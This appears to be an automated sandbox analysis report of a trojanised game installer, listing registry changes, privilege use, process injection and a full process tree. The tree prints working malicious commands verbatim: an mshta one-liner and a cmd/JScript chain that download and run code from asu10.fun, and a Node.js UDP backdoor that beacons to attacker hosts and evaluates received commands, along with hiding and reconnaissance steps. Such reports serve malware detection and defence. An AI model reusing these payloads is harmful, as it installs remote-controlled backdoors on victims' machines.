Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	5TbjRG.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	5TbjRG.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	5TbjRG.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	5TbjRG.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Garbage Cleaner.exe

NTFS ADS 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\40867d2a760ef1a6:ads	node.exe
File created	C:\ProgramData\DNTException\node.exe:dc2467ba821c94153074680f2b7931c4	node.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	35	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	37	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1864	Anime-Fighters-Infin_734316524.tmp
1864	Anime-Fighters-Infin_734316524.tmp
1748	Expedita.exe
1748	Expedita.exe
1748	Expedita.exe
1564	MsiExec.exe
288	MsiExec.exe
288	MsiExec.exe
516	msiexec.exe
516	msiexec.exe
2436	node.exe
2436	node.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	516	msiexec.exe
Token: SeTakeOwnershipPrivilege	516	msiexec.exe
Token: SeSecurityPrivilege	516	msiexec.exe
Token: SeCreateTokenPrivilege	1268	5TbjRG.exe
Token: SeAssignPrimaryTokenPrivilege	1268	5TbjRG.exe
Token: SeLockMemoryPrivilege	1268	5TbjRG.exe
Token: SeIncreaseQuotaPrivilege	1268	5TbjRG.exe
Token: SeMachineAccountPrivilege	1268	5TbjRG.exe
Token: SeTcbPrivilege	1268	5TbjRG.exe
Token: SeSecurityPrivilege	1268	5TbjRG.exe
Token: SeTakeOwnershipPrivilege	1268	5TbjRG.exe
Token: SeLoadDriverPrivilege	1268	5TbjRG.exe
Token: SeSystemProfilePrivilege	1268	5TbjRG.exe
Token: SeSystemtimePrivilege	1268	5TbjRG.exe
Token: SeProfSingleProcessPrivilege	1268	5TbjRG.exe
Token: SeIncBasePriorityPrivilege	1268	5TbjRG.exe
Token: SeCreatePagefilePrivilege	1268	5TbjRG.exe
Token: SeCreatePermanentPrivilege	1268	5TbjRG.exe
Token: SeBackupPrivilege	1268	5TbjRG.exe
Token: SeRestorePrivilege	1268	5TbjRG.exe
Token: SeShutdownPrivilege	1268	5TbjRG.exe
Token: SeDebugPrivilege	1268	5TbjRG.exe
Token: SeAuditPrivilege	1268	5TbjRG.exe
Token: SeSystemEnvironmentPrivilege	1268	5TbjRG.exe
Token: SeChangeNotifyPrivilege	1268	5TbjRG.exe
Token: SeRemoteShutdownPrivilege	1268	5TbjRG.exe
Token: SeUndockPrivilege	1268	5TbjRG.exe
Token: SeSyncAgentPrivilege	1268	5TbjRG.exe
Token: SeEnableDelegationPrivilege	1268	5TbjRG.exe
Token: SeManageVolumePrivilege	1268	5TbjRG.exe
Token: SeImpersonatePrivilege	1268	5TbjRG.exe
Token: SeCreateGlobalPrivilege	1268	5TbjRG.exe
Token: SeCreateTokenPrivilege	1268	5TbjRG.exe
Token: SeAssignPrimaryTokenPrivilege	1268	5TbjRG.exe
Token: SeLockMemoryPrivilege	1268	5TbjRG.exe
Token: SeIncreaseQuotaPrivilege	1268	5TbjRG.exe
Token: SeMachineAccountPrivilege	1268	5TbjRG.exe
Token: SeTcbPrivilege	1268	5TbjRG.exe
Token: SeSecurityPrivilege	1268	5TbjRG.exe
Token: SeTakeOwnershipPrivilege	1268	5TbjRG.exe
Token: SeLoadDriverPrivilege	1268	5TbjRG.exe
Token: SeSystemProfilePrivilege	1268	5TbjRG.exe
Token: SeSystemtimePrivilege	1268	5TbjRG.exe
Token: SeProfSingleProcessPrivilege	1268	5TbjRG.exe
Token: SeIncBasePriorityPrivilege	1268	5TbjRG.exe
Token: SeCreatePagefilePrivilege	1268	5TbjRG.exe
Token: SeCreatePermanentPrivilege	1268	5TbjRG.exe
Token: SeBackupPrivilege	1268	5TbjRG.exe
Token: SeRestorePrivilege	1268	5TbjRG.exe
Token: SeShutdownPrivilege	1268	5TbjRG.exe
Token: SeDebugPrivilege	1268	5TbjRG.exe
Token: SeAuditPrivilege	1268	5TbjRG.exe
Token: SeSystemEnvironmentPrivilege	1268	5TbjRG.exe
Token: SeChangeNotifyPrivilege	1268	5TbjRG.exe
Token: SeRemoteShutdownPrivilege	1268	5TbjRG.exe
Token: SeUndockPrivilege	1268	5TbjRG.exe
Token: SeSyncAgentPrivilege	1268	5TbjRG.exe
Token: SeEnableDelegationPrivilege	1268	5TbjRG.exe
Token: SeManageVolumePrivilege	1268	5TbjRG.exe
Token: SeImpersonatePrivilege	1268	5TbjRG.exe
Token: SeCreateGlobalPrivilege	1268	5TbjRG.exe
Token: SeCreateTokenPrivilege	1268	5TbjRG.exe
Token: SeAssignPrimaryTokenPrivilege	1268	5TbjRG.exe
Token: SeLockMemoryPrivilege	1268	5TbjRG.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1864	Anime-Fighters-Infin_734316524.tmp
1268	5TbjRG.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1988 wrote to memory of 1864	1988	Anime-Fighters-Infin_734316524.exe	28
PID 1988 wrote to memory of 1864	1988	Anime-Fighters-Infin_734316524.exe	28
PID 1988 wrote to memory of 1864	1988	Anime-Fighters-Infin_734316524.exe	28
PID 1988 wrote to memory of 1864	1988	Anime-Fighters-Infin_734316524.exe	28
PID 1988 wrote to memory of 1864	1988	Anime-Fighters-Infin_734316524.exe	28
PID 1988 wrote to memory of 1864	1988	Anime-Fighters-Infin_734316524.exe	28
PID 1988 wrote to memory of 1864	1988	Anime-Fighters-Infin_734316524.exe	28
PID 1864 wrote to memory of 1748	1864	Anime-Fighters-Infin_734316524.tmp	30
PID 1864 wrote to memory of 1748	1864	Anime-Fighters-Infin_734316524.tmp	30
PID 1864 wrote to memory of 1748	1864	Anime-Fighters-Infin_734316524.tmp	30
PID 1864 wrote to memory of 1748	1864	Anime-Fighters-Infin_734316524.tmp	30
PID 1748 wrote to memory of 1360	1748	Expedita.exe	33
PID 1748 wrote to memory of 1360	1748	Expedita.exe	33
PID 1748 wrote to memory of 1360	1748	Expedita.exe	33
PID 1748 wrote to memory of 1360	1748	Expedita.exe	33
PID 1748 wrote to memory of 1268	1748	Expedita.exe	34
PID 1748 wrote to memory of 1268	1748	Expedita.exe	34
PID 1748 wrote to memory of 1268	1748	Expedita.exe	34
PID 1748 wrote to memory of 1268	1748	Expedita.exe	34
PID 1748 wrote to memory of 1268	1748	Expedita.exe	34
PID 1748 wrote to memory of 1268	1748	Expedita.exe	34
PID 1748 wrote to memory of 1268	1748	Expedita.exe	34
PID 516 wrote to memory of 1564	516	msiexec.exe	36
PID 516 wrote to memory of 1564	516	msiexec.exe	36
PID 516 wrote to memory of 1564	516	msiexec.exe	36
PID 516 wrote to memory of 1564	516	msiexec.exe	36
PID 516 wrote to memory of 1564	516	msiexec.exe	36
PID 516 wrote to memory of 1564	516	msiexec.exe	36
PID 516 wrote to memory of 1564	516	msiexec.exe	36
PID 1268 wrote to memory of 612	1268	5TbjRG.exe	37
PID 1268 wrote to memory of 612	1268	5TbjRG.exe	37
PID 1268 wrote to memory of 612	1268	5TbjRG.exe	37
PID 1268 wrote to memory of 612	1268	5TbjRG.exe	37
PID 1268 wrote to memory of 612	1268	5TbjRG.exe	37
PID 1268 wrote to memory of 612	1268	5TbjRG.exe	37
PID 1268 wrote to memory of 612	1268	5TbjRG.exe	37
PID 516 wrote to memory of 288	516	msiexec.exe	38
PID 516 wrote to memory of 288	516	msiexec.exe	38
PID 516 wrote to memory of 288	516	msiexec.exe	38
PID 516 wrote to memory of 288	516	msiexec.exe	38
PID 516 wrote to memory of 288	516	msiexec.exe	38
PID 516 wrote to memory of 288	516	msiexec.exe	38
PID 516 wrote to memory of 288	516	msiexec.exe	38
PID 288 wrote to memory of 1892	288	MsiExec.exe	39
PID 288 wrote to memory of 1892	288	MsiExec.exe	39
PID 288 wrote to memory of 1892	288	MsiExec.exe	39
PID 288 wrote to memory of 1892	288	MsiExec.exe	39
PID 516 wrote to memory of 1648	516	msiexec.exe	43
PID 516 wrote to memory of 1648	516	msiexec.exe	43
PID 516 wrote to memory of 1648	516	msiexec.exe	43
PID 516 wrote to memory of 1648	516	msiexec.exe	43
PID 516 wrote to memory of 1648	516	msiexec.exe	43
PID 516 wrote to memory of 1648	516	msiexec.exe	43
PID 516 wrote to memory of 1648	516	msiexec.exe	43
PID 1360 wrote to memory of 1384	1360	4k3pJuomY9ufA5v.exe	44
PID 1360 wrote to memory of 1384	1360	4k3pJuomY9ufA5v.exe	44
PID 1360 wrote to memory of 1384	1360	4k3pJuomY9ufA5v.exe	44
PID 1360 wrote to memory of 1384	1360	4k3pJuomY9ufA5v.exe	44
PID 1384 wrote to memory of 1972	1384	cmd.exe	46
PID 1384 wrote to memory of 1972	1384	cmd.exe	46
PID 1384 wrote to memory of 1972	1384	cmd.exe	46
PID 1384 wrote to memory of 1972	1384	cmd.exe	46
PID 1972 wrote to memory of 996	1972	52225395540.exe	47
PID 1972 wrote to memory of 996	1972	52225395540.exe	47

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
7044	attrib.exe
2600	attrib.exe
2612	attrib.exe
7008	attrib.exe
7020	attrib.exe
7032	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Anime-Fighters-Infin_734316524.exe
"C:\Users\Admin\AppData\Local\Temp\Anime-Fighters-Infin_734316524.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1988
- C:\Users\Admin\AppData\Local\Temp\is-OUETP.tmp\Anime-Fighters-Infin_734316524.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-OUETP.tmp\Anime-Fighters-Infin_734316524.tmp" /SL5="$40158,3656070,140800,C:\Users\Admin\AppData\Local\Temp\Anime-Fighters-Infin_734316524.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:1864
- - C:\Program Files (x86)\Vel\magnam\Expedita.exe
    "C:\Program Files (x86)\Vel/\magnam\Expedita.exe" 32cb7aca069a0c8bb8d51fccce1d3826
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1748
  - - C:\Users\Admin\AppData\Local\Temp\yXIKetvm\4k3pJuomY9ufA5v.exe
      C:\Users\Admin\AppData\Local\Temp\yXIKetvm\4k3pJuomY9ufA5v.exe /usthree SUB=32cb7aca069a0c8bb8d51fccce1d3826
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1360
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{nXa0-XLbu0-rMHG-kzyWB}\52225395540.exe"
        5⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1384
      - C:\Users\Admin\AppData\Local\Temp\{nXa0-XLbu0-rMHG-kzyWB}\52225395540.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{nXa0-XLbu0-rMHG-kzyWB}\52225395540.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1972
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta "javascript:document.write();0;y=unescape('%320%33%7E%68t%74p%3A%2F%2Fa%73u%310%2Ef%75n%2Fh%72i%2F%3F%321%616%654%62%7E%330').split('~');240;try{x='WinHttp';235;x=new ActiveXObject(x+'.'+x+'Request.5.1');239;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);72;x.send();82;y='ipt.S';78;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);196;}catch(e){};2;;window.close();"
        7⤵
        Blocklisted process makes network request
        
        PID:996
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1630610062060.txt & cscript /nologo /e:jscript get1630610062060.txt "http%3A%2F%2Fasu10.fun%2Fhri%2F%3F202e13180%26b%3D95aeba91" node.cab & expand node.cab node.exe & del get1630610062060.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1630610062060.txt & cscript /nologo /e:jscript get1630610062060.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%2702e13180%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu10.fun%27);s.send(b,0,b.length,19584,%27lu1.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1630610062060.txt
        8⤵
        
        PID:2132
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript /nologo /e:jscript get1630610062060.txt "http%3A%2F%2Fasu10.fun%2Fhri%2F%3F202e13180%26b%3D95aeba91" node.cab
        9⤵
        Blocklisted process makes network request
        
        PID:2180
        
        C:\Windows\SysWOW64\expand.exe
        
        expand node.cab node.exe
        9⤵
        Drops file in Windows directory
        
        PID:2364
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript /nologo /e:jscript get1630610062060.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%2702e13180%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu10.fun%27);s.send(b,0,b.length,19584,%27lu1.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"
        9⤵
        Loads dropped DLL
        
        PID:2380
        
        C:\ProgramData\DNTException\node.exe
        
        "C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%2702e13180%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu10.fun%27);s.send(b,0,b.length,19584,%27lu1.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))
        10⤵
        Executes dropped EXE
        Checks processor information in registry
        NTFS ADS
        Suspicious behavior: EnumeratesProcesses
        
        PID:2436
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c dir C:\
        11⤵
        
        PID:2552
        
        C:\Windows\SysWOW64\cacls.exe
        
        cacls.exe C:\ProgramData\DNTException /t /e /c /g Everyone:F
        11⤵
        
        PID:2568
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls.exe C:\ProgramData\DNTException /t /c /grant *S-1-1-0:(f)
        11⤵
        Modifies file permissions
        
        PID:2584
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib.exe +H C:\ProgramData\DNTException
        11⤵
        Views/modifies file attributes
        
        PID:2600
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib.exe +H C:\ProgramData\DNTException\node.exe
        11⤵
        Views/modifies file attributes
        
        PID:2612
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fo csv /nh
        11⤵
        Enumerates processes with tasklist
        
        PID:2164
        
        C:\Windows\SysWOW64\Wbem\wmic.exe
        
        wmic process get processid,parentprocessid,name,executablepath /format:csv
        11⤵
        
        PID:2264
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig.exe /all
        11⤵
        Gathers network information
        
        PID:1608
        
        C:\Windows\SysWOW64\route.exe
        
        route.exe print
        11⤵
        
        PID:1168
        
        C:\Windows\SysWOW64\netstat.exe
        
        netstat.exe -ano
        11⤵
        Gathers network information
        
        PID:2360
        
        C:\Windows\SysWOW64\systeminfo.exe
        
        systeminfo.exe /fo csv
        11⤵
        Gathers system information
        
        PID:2212
        
        C:\Windows\SysWOW64\cacls.exe
        
        cacls.exe C:\ProgramData\Intel /t /e /c /g Everyone:F
        11⤵
        
        PID:6976
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls.exe C:\ProgramData\Intel /t /c /grant *S-1-1-0:(f)
        11⤵
        Modifies file permissions
        
        PID:6992
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib.exe +H C:\ProgramData\Intel
        11⤵
        Views/modifies file attributes
        
        PID:7008
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib.exe +H "C:\ProgramData\Intel\Intel(R) Management Engine Components"
        11⤵
        Views/modifies file attributes
        
        PID:7020
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib.exe +H "C:\ProgramData\Intel\Intel(R) Management Engine Components\Intel MEC 133533413"
        11⤵
        Views/modifies file attributes
        
        PID:7032
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib.exe +H "C:\ProgramData\Intel\Intel(R) Management Engine Components\Intel MEC 1582787339"
        11⤵
        Views/modifies file attributes
        
        PID:7044
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
        11⤵
        Modifies registry key
        
        PID:7056
        
        C:\Windows\SysWOW64\reg.exe
        
